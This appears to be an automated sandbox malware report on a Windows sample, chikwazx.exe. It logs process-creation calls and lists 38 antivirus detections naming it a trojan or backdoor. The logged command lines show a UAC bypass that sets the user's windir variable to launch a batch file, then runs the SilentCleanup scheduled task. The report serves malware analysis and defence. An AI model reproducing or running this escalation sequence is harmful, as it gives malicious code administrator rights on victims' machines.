CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 2064 thread_handle: 0x00000088 process_identifier: 3068 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3068	1	0
CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 2136 thread_handle: 0x00000088 process_identifier: 2140 current_directory: C:\Users\Public filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete hkcu\Environment /v windir /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 2188 thread_handle: 0x00000084 process_identifier: 2196 current_directory: C:\Users\Public filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 2260 thread_handle: 0x00000088 process_identifier: 2252 current_directory: C:\Users\Public filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW Nov. 17, 2021, 7:45 a.m.	thread_identifier: 2488 thread_handle: 0x00000088 process_identifier: 2492 current_directory: filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete hkcu\Environment /v windir /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
NtResumeThread Nov. 17, 2021, 7:45 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2492	1	0

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

MicroWorld-eScan	Trojan.GenericKDZ.79974
FireEye	Trojan.GenericKDZ.79974
CAT-QuickHeal	Backdoor.Agent
ALYac	Trojan.GenericKDZ.79974
Malwarebytes	Trojan.MalPack.DLF
K7AntiVirus	Trojan ( 0058a4d11 )
Alibaba	Backdoor:Win32/DelfInject.f3031736
K7GW	Trojan ( 0058a4d11 )
Cyren	W32/Delf.GFZI-4902
ESET-NOD32	Win32/TrojanDownloader.Delf.DIB
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Backdoor.Win32.Agent.myuezr
BitDefender	Trojan.GenericKDZ.79974
Avast	Win32:BackdoorX-gen [Trj]
Ad-Aware	Trojan.GenericKDZ.79974
Emsisoft	Trojan.GenericKDZ.79974 (B)
DrWeb	Trojan.PWS.Siggen3.5101
TrendMicro	TROJ_GEN.R002C0DKC21
McAfee-GW-Edition	BehavesLike.Win32.Rootkit.ch
Sophos	Mal/Generic-S
Antiy-AVL	Trojan/Generic.ASMalwS.34CCA27
Microsoft	Trojan:Win32/DelfInject.SMQ!MTB
Gridinsoft	Trojan.Win32.Downloader.sa
GData	Trojan.GenericKDZ.79974
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.R449607
McAfee	GenericRXQR-RZ!843F2ACB5A70
MAX	malware (ai score=87)
VBA32	BScope.Backdoor.NetWiredRC
Cylance	Unsafe
TrendMicro-HouseCall	TROJ_GEN.R002C0DKC21
Tencent	Win32.Backdoor.Agent.Dygl
Yandex	Backdoor.Agent!RkJKg5HLmGc
Ikarus	Trojan.Inject
Fortinet	W32/Injector.EQAC!tr
AVG	Win32:BackdoorX-gen [Trj]
Panda	Trj/GdSda.A

chikwazx.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All